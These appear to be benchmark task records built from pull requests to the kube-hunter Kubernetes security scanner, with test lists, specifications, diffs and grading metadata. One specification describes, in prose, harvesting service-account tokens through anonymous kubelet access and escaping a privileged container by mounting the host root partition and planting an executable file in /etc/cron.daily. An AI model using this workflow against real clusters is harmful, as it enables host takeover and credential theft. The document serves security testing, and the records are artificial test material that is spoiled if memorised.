"tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_success", "tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_failure_when_touch", "tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_failure_when_chmod", "tests/hunting/test_kubelet.py::test_check_directory_exists_existing_directory", "tests/hunting/test_kubelet.py::test_check_directory_exists_non_existent_directory", "tests/hunting/test_kubelet.py::test_rmdir_command_removed_successfully", "tests/hunting/test_kubelet.py::test_rmdir_command_removed_failed", "tests/hunting/test_kubelet.py::test_get_root_values_success", "tests/hunting/test_kubelet.py::test_get_root_values_failure", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_success", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_cat_cmdline", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_findfs", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_mkdir", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_mount", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_cat_hostname", "tests/hunting/test_kubelet.py::test_maliciousintentviasecurekubeletport_success" ]
[]
Method: ProveAnonymousAuth.__init__(self, event) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: event – an instance of AnonymousAuthEnabled containing host and a requests‑Session. Outputs: Initializes the hunter, setting self.event and self.base_url derived from event.host. Description: Creates a ProveAnonymousAuth active‑hunter bound to the event that discovered anonymous kubelet access. Method: ProveAnonymousAuth.get_request(self, url, verify=False) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: url – full HTTPS URL to request; verify – bool (default False) to control SSL verification. Outputs: response body text stripped of trailing whitespace, or a string “Exception: …” on error. Description: Sends a GET request via the event’s session with a configured timeout and returns the raw text or an error marker. Method: ProveAnonymousAuth.post_request(self, url, params, verify=False) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: url – full HTTPS URL; params – dict of query parameters (e.g., {"cmd": "ls"}); verify – bool. Outputs: response body text stripped of trailing whitespace, or “Exception: …” on error. Description: Sends a POST request (used to invoke kubelet run commands) and returns the response text or an error marker. Method: ProveAnonymousAuth.has_no_exception(result) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: result – string returned from a request. Outputs: bool – True if the string does not contain “Exception: ”. Description: Helper that checks whether a request result indicates an exception. Method: ProveAnonymousAuth.has_no_error(result) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: result – string returned from a request. Outputs: bool – True if the string does not contain any known error substrings (e.g., “exited with”, “Permission denied”). Description: Detects generic command‑execution errors in kubelet responses. 
Method: ProveAnonymousAuth.has_no_error_nor_exception(result) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: result – string. Outputs: bool – True only if both has_no_error and has_no_exception are True. Description: Composite validator used throughout the hunter to confirm a clean command response. Method: ProveAnonymousAuth.execute(self) Location: kube_hunter.modules.hunting.kubelet.ProveAnonymousAuth Inputs: None (uses self.event and self.base_url). Outputs: Populates self.event.evidence with a summary of breached containers and publishes ExposedExistingPrivilegedContainersViaSecureKubeletPort if privileged containers are found. Description: Retrieves the pod list, extracts service‑account tokens and env vars from each container, and records evidence; also triggers the next active hunter. Method: MaliciousIntentViaSecureKubeletPort.__init__(self, event, seconds_to_wait_for_os_command=1) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: event – an ExposedExistingPrivilegedContainersViaSecureKubeletPort instance; seconds_to_wait_for_os_command – optional delay between OS commands (default 1 sec). Outputs: Initializes the hunter, setting base URL, timing knobs and retry counters. Description: Creates a hunter that will attempt to abuse privileged containers discovered by the previous hunter. Method: MaliciousIntentViaSecureKubeletPort.post_request(self, url, params, verify=False) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: url – HTTPS endpoint; params – dict of command parameters; verify – bool. Outputs: response text stripped of whitespace or “Exception: …” on error. Description: Sends a POST request through the event’s session (same semantics as ProveAnonymousAuth.post_request). 
Method: MaliciousIntentViaSecureKubeletPort.check_file_exists(self, run_request_url, file) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: run_request_url – base “run/…/container” URL; file – filename to test. Outputs: bool – True if an ls command reports the file without error/exception. Description: Determines whether a given file is present inside the target container. Method: MaliciousIntentViaSecureKubeletPort.rm_command(self, run_request_url, file_to_remove, number_of_rm_attempts, seconds_to_wait_for_os_command) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: run_request_url – container run URL; file_to_remove – path of the file; number_of_rm_attempts – retry count; seconds_to_wait_for_os_command – optional delay. Outputs: bool – True if the file was successfully removed (verified by a subsequent ls); otherwise False. Description: Attempts to delete a file via rm and verifies removal, retrying as configured. Method: MaliciousIntentViaSecureKubeletPort.rmdir_command(self, run_request_url, directory_to_remove, number_of_rmdir_attempts, seconds_to_wait_for_os_command) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: run_request_url – container run URL; directory_to_remove – target directory; number_of_rmdir_attempts – retries; seconds_to_wait_for_os_command – optional delay. Outputs: bool – True if the directory disappears after rmdir; otherwise False. Description: Attempts to delete a directory and confirms its removal. Method: MaliciousIntentViaSecureKubeletPort.get_root_values(self, command_line) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: command_line – string content of /proc/cmdline. 
Outputs: tuple (root_value, root_value_type) where root_value is the extracted root identifier (e.g., “mock”) and root_value_type is the prefix (e.g., “LABEL=”) or empty string; returns (None, None) if not found. Description: Parses kernel command‑line to locate a “root=” definition and separates its type and value. Method: MaliciousIntentViaSecureKubeletPort.process_exposed_existing_privileged_container(self, run_request_url, number_of_umount_attempts, number_of_rmdir_attempts, seconds_to_wait_for_os_command, directory_to_create=None) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: run_request_url – container run URL; number_of_umount_attempts, number_of_rmdir_attempts – retry limits; seconds_to_wait_for_os_command – optional delay; directory_to_create – optional custom mount point (default generated). Outputs: dict with keys result (bool), file_system_or_partition (str, when result True), directory_created (str, when result True). Description: Executes the full mount‑exploitation workflow: reads /proc/cmdline, resolves the root partition via findfs, creates a mount point, mounts the partition, reads the host’s /etc/hostname, and returns success information; cleans up on failure. Method: MaliciousIntentViaSecureKubeletPort.attack_exposed_existing_privileged_container(self, run_request_url, directory_created, number_of_rm_attempts, seconds_to_wait_for_os_command, file_name=None) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: run_request_url – container run URL; directory_created – mount point; number_of_rm_attempts – retries for cleanup; seconds_to_wait_for_os_command – optional delay; file_name – optional custom filename (defaults to a UUID‑based name). Outputs: dict with result (bool) and file_created (str when result True). 
Description: Attempts to create a file under /etc/cron.daily inside the mounted host filesystem, chmod it to executable, and returns success; on failure it removes the file. Method: MaliciousIntentViaSecureKubeletPort.execute(self, directory_to_create=None, file_name=None) Location: kube_hunter.modules.hunting.kubelet.MaliciousIntentViaSecureKubeletPort Inputs: directory_to_create – optional mount‑point name; file_name – optional payload filename. Outputs: Populates self.event.evidence with a human‑readable summary of successful or failed abuses. Description: Iterates over all privileged containers reported by the previous hunter, runs the mount‑exploitation workflow, performs the file‑creation attack, cleans up artifacts, and records the overall outcome.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -r requirements-dev.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/core/test_handler.py tests/hunting/test_kubelet.py" }
{ "num_modified_files": 3, "num_modified_lines": 573, "pr_author": "abdullahgarcia", "pr_labels": [], "llm_metadata": { "code": "B2", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [ "https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md", "https://help.github.com/en/github/managing-your-work-on-github/closing-issues-using-keywords" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests two new active kubelet hunters to demonstrate foothold and malicious intent via the secure kubelet port. The provided tests expect concrete class names (ProveAnonymousAuth, MaliciousIntentViaSecureKubeletPort) and specific helper methods that were not mentioned in the issue description, indicating an implicit naming requirement. 
Because the tests introduce expectations not stated in the issue, the task is classified as B2 (implicit naming).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests import and use class ProveAnonymousAuth while the issue refers to FootholdViaSecureKubeletPort", "Tests validate numerous internal helper methods (e.g., get_request, post_request, has_no_error) that are not described in the issue", "Tests expect specific behavior and signatures not explicit in the issue" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ad4cfe1c11391f66b05df7e26f2059515f1f9988
2020-09-07 12:13:32
codecov[bot]: # [Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=h1) Report > Merging [#372](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=desc) into [master](https://codecov.io/gh/aquasecurity/kube-hunter/commit/3950a1c2f279a3372496e9369c12b3f2a852d5de?el=desc) will **decrease** coverage by `0.18%`. > The diff coverage is `0.00%`. [![Impacted file tree graph](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372/graphs/tree.svg?width=650&height=150&src=pr&token=hXSGvlUpkI)](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #372 +/- ## ========================================== - Coverage 62.77% 62.59% -0.19% ========================================== Files 42 42 Lines 2281 2286 +5 ========================================== - Hits 1432 1431 -1 - Misses 849 855 +6 ``` | [Impacted Files](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [kube\_hunter/modules/hunting/aks.py](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372/diff?src=pr&el=tree#diff-a3ViZV9odW50ZXIvbW9kdWxlcy9odW50aW5nL2Frcy5weQ==) | `33.89% <0.00%> (-3.14%)` | :arrow_down: | | [kube\_hunter/core/events/handler.py](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372/diff?src=pr&el=tree#diff-a3ViZV9odW50ZXIvY29yZS9ldmVudHMvaGFuZGxlci5weQ==) | `90.09% <0.00%> (-1.00%)` | :arrow_down: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=footer). Last update [3950a1c...64e2df2](https://codecov.io/gh/aquasecurity/kube-hunter/pull/372?src=pr&el=lastupdated). 
Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
aquasecurity__kube-hunter-372
diff --git a/kube_hunter/modules/hunting/aks.py b/kube_hunter/modules/hunting/aks.py index a5877c3..f937178 100644 --- a/kube_hunter/modules/hunting/aks.py +++ b/kube_hunter/modules/hunting/aks.py @@ -46,11 +46,16 @@ class AzureSpnHunter(Hunter): logger.debug("failed getting pod info") else: pods_data = r.json().get("items", []) + suspicious_volume_names = [] for pod_data in pods_data: - for container in pod_data["spec"]["containers"]: - for mount in container["volumeMounts"]: - path = mount["mountPath"] + for volume in pod_data["spec"].get("volumes", []): + if volume.get("hostPath"): + path = volume["hostPath"]["path"] if "/etc/kubernetes/azure.json".startswith(path): + suspicious_volume_names.append(volume["name"]) + for container in pod_data["spec"]["containers"]: + for mount in container.get("volumeMounts", []): + if mount["name"] in suspicious_volume_names: return { "name": container["name"], "pod": pod_data["metadata"]["name"],
fix azure spn hunter Fixes https://github.com/aquasecurity/kube-hunter/issues/370
**Title** Improve Azure SPN hunter to detect azure.json mounted via hostPath volumes **Problem** The Azure SPN hunter misses pods that expose the Azure credentials file when it is mounted through a hostPath volume, resulting in false‑negative findings. It can also error out when expected fields are absent. **Root Cause** Detection logic only examined container `volumeMount.mountPath` and ignored the underlying volume’s `hostPath`, and it assumed those fields were always present. **Fix / Expected Behavior** - Scan pod volumes for a `hostPath` that points to the Azure credentials file. - Collect the names of such volumes. - Report a container/pod match when a container mounts any of those suspicious volumes. - Gracefully handle missing `volumes` or `volumeMounts` fields. - Preserve existing behavior for direct `mountPath` matches. **Risk & Validation** - Add tests covering pods that use a hostPath volume for the credentials file and ensure they are detected. - Run the full test suite to confirm no regressions in other hunting modules. - Verify that pods without the suspicious setup are not falsely flagged.
372
aquasecurity/kube-hunter
diff --git a/tests/hunting/test_aks.py b/tests/hunting/test_aks.py new file mode 100644 index 0000000..008501a --- /dev/null +++ b/tests/hunting/test_aks.py @@ -0,0 +1,56 @@ +# flake8: noqa: E402 +import requests_mock + +from kube_hunter.conf import Config, set_config + +set_config(Config()) + +from kube_hunter.modules.hunting.kubelet import ExposedRunHandler +from kube_hunter.modules.hunting.aks import AzureSpnHunter + + +def test_AzureSpnHunter(): + e = ExposedRunHandler() + e.host = "mockKubernetes" + e.port = 443 + e.protocol = "https" + + pod_template = '{{"items":[ {{"apiVersion":"v1","kind":"Pod","metadata":{{"name":"etc","namespace":"default"}},"spec":{{"containers":[{{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{{"mountPath":"/mp","name":"v"}}]}}],"volumes":[{{"hostPath":{{"path":"{}"}},"name":"v"}}]}}}} ]}}' + + bad_paths = ["/", "/etc", "/etc/", "/etc/kubernetes", "/etc/kubernetes/azure.json"] + good_paths = ["/yo", "/etc/yo", "/etc/kubernetes/yo.json"] + + for p in bad_paths: + with requests_mock.Mocker() as m: + m.get("https://mockKubernetes:443/pods", text=pod_template.format(p)) + h = AzureSpnHunter(e) + c = h.get_key_container() + assert c + + for p in good_paths: + with requests_mock.Mocker() as m: + m.get("https://mockKubernetes:443/pods", text=pod_template.format(p)) + h = AzureSpnHunter(e) + c = h.get_key_container() + assert c == None + + with requests_mock.Mocker() as m: + pod_no_volume_mounts = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}],"volumes":[{"hostPath":{"path":"/whatever"},"name":"v"}]}} ]}' + m.get("https://mockKubernetes:443/pods", text=pod_no_volume_mounts) + h = AzureSpnHunter(e) + c = h.get_key_container() + assert c == None + + with requests_mock.Mocker() as m: + pod_no_volumes = '{"items":[ 
{"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}]}} ]}' + m.get("https://mockKubernetes:443/pods", text=pod_no_volumes) + h = AzureSpnHunter(e) + c = h.get_key_container() + assert c == None + + with requests_mock.Mocker() as m: + pod_other_volume = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{"mountPath":"/mp","name":"v"}]}],"volumes":[{"emptyDir":{},"name":"v"}]}} ]}' + m.get("https://mockKubernetes:443/pods", text=pod_other_volume) + h = AzureSpnHunter(e) + c = h.get_key_container() + assert c == None
[ "tests/hunting/test_aks.py::test_AzureSpnHunter" ]
[]
Method: AzureSpnHunter.__init__(self, handler) Location: kube_hunter/modules/hunting/aks.py Inputs: - **handler** (ExposedRunHandler): an instance representing a reachable kubelet endpoint, providing host, port, and protocol attributes used to build request URLs. Outputs: - Instance of AzureSpnHunter properly initialised with the supplied handler; no return value. Description: Constructs the AzureSpnHunter hunter with a specific kubelet handler so that subsequent calls can query pod information on the target cluster. Method: AzureSpnHunter.get_key_container(self) Location: kube_hunter/modules/hunting/aks.py Inputs: - **self** (AzureSpnHunter): the hunter instance, which uses its stored handler to request `/pods` from the kubelet. Outputs: - **dict** containing `name` and `pod` keys when a container mounts a hostPath volume that could expose the Azure service‑principal JSON file, or **None** when no such container is found. Description: Scans the list of pods retrieved from the kubelet, identifies any hostPath volume that includes “/etc/kubernetes/azure.json”, and returns the first container that mounts that volume; otherwise signals no finding with None.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -r requirements-dev.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/hunting/test_aks.py" }
{ "num_modified_files": 1, "num_modified_lines": 8, "pr_author": "itaysk", "pr_labels": [], "llm_metadata": { "code": "B3", "code_quality": null, "confidence": 0.85, "detected_issues": { "B1": false, "B2": false, "B3": true, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/aquasecurity/kube-hunter/issues/370" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "security_bug" ], "reason": null, "reasoning": "The issue requests fixing the Azure SPN hunter but provides no details; the required behavior is inferred from an external issue URL and the accompanying test suite. The tests clearly define the expected detection logic, and the provided golden patch satisfies those assertions without introducing unrelated requirements. Because essential specifications reside in the external URL and are not quoted, the primary problem is an external dependency (B3).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
1a26653007ae2c82db04ac73a5d336f2336db772
2021-04-20 15:10:44
aquasecurity__kube-hunter-448
diff --git a/kube_hunter/core/events/handler.py b/kube_hunter/core/events/handler.py index 24eb1dc..667e88e 100644 --- a/kube_hunter/core/events/handler.py +++ b/kube_hunter/core/events/handler.py @@ -6,7 +6,7 @@ from threading import Thread from kube_hunter.conf import get_config from kube_hunter.core.types import ActiveHunter, HunterBase -from kube_hunter.core.events.types import Vulnerability, EventFilterBase +from kube_hunter.core.events.types import Vulnerability, EventFilterBase, MultipleEventsContainer logger = logging.getLogger(__name__) @@ -19,11 +19,33 @@ class EventQueue(Queue): self.active_hunters = dict() self.all_hunters = dict() - self.hooks = defaultdict(list) - self.filters = defaultdict(list) self.running = True self.workers = list() + # -- Regular Subscription -- + # Structure: key: Event Class, value: tuple(Registered Hunter, Predicate Function) + self.hooks = defaultdict(list) + self.filters = defaultdict(list) + # -------------------------- + + # -- Multiple Subscription -- + # Structure: key: Event Class, value: tuple(Registered Hunter, Predicate Function) + self.multi_hooks = defaultdict(list) + + # When subscribing to multiple events, this gets populated with required event classes + # Structure: key: Hunter Class, value: set(RequiredEventClass1, RequiredEventClass2) + self.hook_dependencies = defaultdict(set) + + # To keep track of fulfilled dependencies. we need to have a structure which saves historical instanciated + # events mapped to a registered hunter. 
+ # We used a 2 dimensional dictionary in order to fulfill two demands: + # * correctly count published required events + # * save historical events fired, easily sorted by their type + # + # Structure: hook_fulfilled_deps[hunter_class] -> fulfilled_events_for_hunter[event_class] -> [EventObject, EventObject2] + self.hook_fulfilled_deps = defaultdict(lambda: defaultdict(list)) + # --------------------------- + for _ in range(num_worker): t = Thread(target=self.worker) t.daemon = True @@ -34,16 +56,66 @@ class EventQueue(Queue): t.daemon = True t.start() - # decorator wrapping for easy subscription + """ + ###################################################### + + ----------------- Public Methods ----------------- + + ###################################################### + """ + def subscribe(self, event, hook=None, predicate=None): + """ + The Subscribe Decorator - For Regular Registration + Use this to register for one event only. Your hunter will execute each time this event is published + + @param event - Event class to subscribe to + @param predicate - Optional: Function that will be called with the published event as a parameter before trigger. + If it's return value is False, the Hunter will not run (default=None). + @param hook - Hunter class to register for (ignore when using as a decorator) + """ + def wrapper(hook): self.subscribe_event(event, hook=hook, predicate=predicate) return hook return wrapper - # wrapper takes care of the subscribe once mechanism + def subscribe_many(self, events, hook=None, predicates=None): + """ + The Subscribe Many Decorator - For Multiple Registration, + When your attack needs several prerequisites to exist in the cluster, You need to register for multiple events. + Your hunter will execute once for every new combination of required events. + For example: + 1. event A was published 3 times + 2. event B was published once. + 3. 
event B was published again + Your hunter will execute 2 times: + * (on step 2) with the newest version of A + * (on step 3) with the newest version of A and newest version of B + + @param events - List of event classes to subscribe to + @param predicates - Optional: List of function that will be called with the published event as a parameter before trigger. + If it's return value is False, the Hunter will not run (default=None). + @param hook - Hunter class to register for (ignore when using as a decorator) + """ + + def wrapper(hook): + self.subscribe_events(events, hook=hook, predicates=predicates) + return hook + + return wrapper + def subscribe_once(self, event, hook=None, predicate=None): + """ + The Subscribe Once Decorator - For Single Trigger Registration, + Use this when you want your hunter to execute only in your entire program run + wraps subscribe_event method + + @param events - List of event classes to subscribe to + @param predicates - Optional: List of function that will be called with the published event as a parameter before trigger. + If it's return value is False, the Hunter will not run (default=None). + @param hook - Hunter class to register for (ignore when using as a decorator) + """ + def wrapper(hook): # installing a __new__ magic method on the hunter # which will remove the hunter from the list upon creation @@ -58,29 +130,160 @@ class EventQueue(Queue): return wrapper - # getting uninstantiated event object - def subscribe_event(self, event, hook=None, predicate=None): + def publish_event(self, event, caller=None): + """ + The Publish Event Method - For Publishing Events To Kube-Hunter's Queue + """ + # Document that the hunter published a vulnerability (if it's indeed a vulnerability) + # For statistics options + self._increase_vuln_count(event, caller) + + # sets the event's parent to be it's publisher hunter. + self._set_event_chain(event, caller) + + # applying filters on the event, before publishing it to subscribers. 
+ # if filter returned None, not proceeding to publish + event = self.apply_filters(event) + if event: + # If event was rewritten, make sure it's linked again + self._set_event_chain(event, caller) + + # Regular Hunter registrations - publish logic + # Here we iterate over all the registered-to events: + for hooked_event in self.hooks.keys(): + # We check if the event we want to publish is an inherited class of the current registered-to iterated event + # Meaning - if this is a relevant event: + if hooked_event in event.__class__.__mro__: + # If so, we want to publish to all registerd hunters. + for hook, predicate in self.hooks[hooked_event]: + if predicate and not predicate(event): + continue + + self.put(hook(event)) + logger.debug(f"Event {event.__class__} got published to hunter - {hook} with {event}") + + # Multiple Hunter registrations - publish logic + # Here we iterate over all the registered-to events: + for hooked_event in self.multi_hooks.keys(): + # We check if the event we want to publish is an inherited class of the current registered-to iterated event + # Meaning - if this is a relevant event: + if hooked_event in event.__class__.__mro__: + # now we iterate over the corresponding registered hunters. + for hook, predicate in self.multi_hooks[hooked_event]: + if predicate and not predicate(event): + continue + + self._update_multi_hooks(hook, event) + + if self._is_all_fulfilled_for_hunter(hook): + events_container = MultipleEventsContainer(self._get_latest_events_from_multi_hooks(hook)) + self.put(hook(events_container)) + logger.debug( + f"Multiple subscription requirements were met for hunter {hook}. 
events container was \ + published with {self.hook_fulfilled_deps[hook].keys()}" + ) + + """ + ###################################################### + + ---------------- Private Methods ----------------- + + + ---------------- (Backend Logic) ----------------- + + ###################################################### + """ + + def _get_latest_events_from_multi_hooks(self, hook): + """ + Iterates over fulfilled deps for the hunter, and fetching the latest appended events from history + """ + latest_events = list() + for event_class in self.hook_fulfilled_deps[hook].keys(): + latest_events.append(self.hook_fulfilled_deps[hook][event_class][-1]) + return latest_events + + def _update_multi_hooks(self, hook, event): + """ + Updates published events in the multi hooks fulfilled store. + """ + self.hook_fulfilled_deps[hook][event.__class__].append(event) + + def _is_all_fulfilled_for_hunter(self, hook): + """ + Returns true for multi hook fulfilled, else oterwise + """ + # Check if the first dimension already contains all necessary event classes + return len(self.hook_fulfilled_deps[hook].keys()) == len(self.hook_dependencies[hook]) + + def _set_event_chain(self, event, caller): + """ + Sets' events attribute chain. + In here we link the event with it's publisher (Hunter), + so in the next hunter that catches this event, we could access the previous one's attributes. + + @param event: the event object to be chained + @param caller: the Hunter object that published this event. + """ + if caller: + event.previous = caller.event + event.hunter = caller.__class__ + + def _register_hunters(self, hook=None): + """ + This method is called when a Hunter registers itself to the handler. + this is done in order to track and correctly configure the current run of the program. 
+ + passive_hunters, active_hunters, all_hunters + """ config = get_config() if ActiveHunter in hook.__mro__: if not config.active: - return - self.active_hunters[hook] = hook.__doc__ + return False + else: + self.active_hunters[hook] = hook.__doc__ elif HunterBase in hook.__mro__: self.passive_hunters[hook] = hook.__doc__ if HunterBase in hook.__mro__: self.all_hunters[hook] = hook.__doc__ + return True + + def _register_filter(self, event, hook=None, predicate=None): + if hook not in self.filters[event]: + self.filters[event].append((hook, predicate)) + logging.debug("{} filter subscribed to {}".format(hook, event)) + + def _register_hook(self, event, hook=None, predicate=None): + if hook not in self.hooks[event]: + self.hooks[event].append((hook, predicate)) + logging.debug("{} subscribed to {}".format(hook, event)) + + def subscribe_event(self, event, hook=None, predicate=None): + if not self._register_hunters(hook): + return + # registering filters if EventFilterBase in hook.__mro__: - if hook not in self.filters[event]: - self.filters[event].append((hook, predicate)) - logger.debug(f"{hook} filter subscribed to {event}") - + self._register_filter(event, hook, predicate) # registering hunters - elif hook not in self.hooks[event]: - self.hooks[event].append((hook, predicate)) - logger.debug(f"{hook} subscribed to {event}") + else: + self._register_hook(event, hook, predicate) + + def subscribe_events(self, events, hook=None, predicates=None): + if not self._register_hunters(hook): + return False + + if predicates is None: + predicates = [None] * len(events) + + # registering filters. + if EventFilterBase in hook.__mro__: + for event, predicate in zip(events, predicates): + self._register_filter(event, hook, predicate) + # registering hunters. 
+ else: + for event, predicate in zip(events, predicates): + self.multi_hooks[event].append((hook, predicate)) + + self.hook_dependencies[hook] = frozenset(events) def apply_filters(self, event): # if filters are subscribed, apply them on the event @@ -97,36 +300,11 @@ class EventQueue(Queue): return None return event - # getting instantiated event object - def publish_event(self, event, caller=None): + def _increase_vuln_count(self, event, caller): config = get_config() - - # setting event chain - if caller: - event.previous = caller.event - event.hunter = caller.__class__ - - # applying filters on the event, before publishing it to subscribers. - # if filter returned None, not proceeding to publish - event = self.apply_filters(event) - if event: - # If event was rewritten, make sure it's linked to its parent ('previous') event - if caller: - event.previous = caller.event - event.hunter = caller.__class__ - - for hooked_event in self.hooks.keys(): - if hooked_event in event.__class__.__mro__: - for hook, predicate in self.hooks[hooked_event]: - if predicate and not predicate(event): - continue - - if config.statistics and caller: - if Vulnerability in event.__class__.__mro__: - caller.__class__.publishedVulnerabilities += 1 - - logger.debug(f"Event {event.__class__} got published with {event}") - self.put(hook(event)) + if config.statistics and caller: + if Vulnerability in event.__class__.__mro__: + caller.__class__.publishedVulnerabilities += 1 # executes callbacks on dedicated thread as a daemon def worker(self): diff --git a/kube_hunter/core/events/types.py b/kube_hunter/core/events/types.py index ef9afc0..6d9e036 100644 --- a/kube_hunter/core/events/types.py +++ b/kube_hunter/core/events/types.py @@ -62,6 +62,20 @@ class Event: return history +class MultipleEventsContainer(Event): + """ + This is the class of the object an hunter will get if he was registered to multiple events. 
+ """ + + def __init__(self, events): + self.events = events + + def get_by_class(self, event_class): + for event in self.events: + if event.__class__ == event_class: + return event + + class Service: def __init__(self, name, path="", secure=True): self.name = name
Multiple Subscriptions Mechanism # Multiple Subscriptions A continuation for this old PR #271 When an hunter needs several prerequisites to exist in the cluster, We need to register for multiple events. This new mechanism allows us to execute once for every new combination of specified required events. For example: let a C hunter be registered to event A and B 1. event A was published 3 times 2. event B was published once. 3. event B was published again The hunter will execute 2 times: * (on step 2) with the newest version of A * (on step 3) with the newest version of A and newest version of B This allows us to run specific hunters multiple times with updated data, only when a minimum set of different events are published. ## Practical Changes This PR Adds: * A new decorator - `@handler.subscribe_many()` * Gets a list of events - `[Event1, Event2]` * A new type of event, `MultipleEventsContainer` which is passed to a hunter which subscribes using `subscribe_many` * implements `get_by_class` method, to get specific events from the container. * Unit Tests * Documentation to this and other backend logic Example can be seen in added Tests ## Fixed Issues #144 ## Contribution checklist - [x] I have read the Contributing Guidelines. - [x] The commits refer to an active issue in the repository. - [x] I have added automated testing to cover this case.
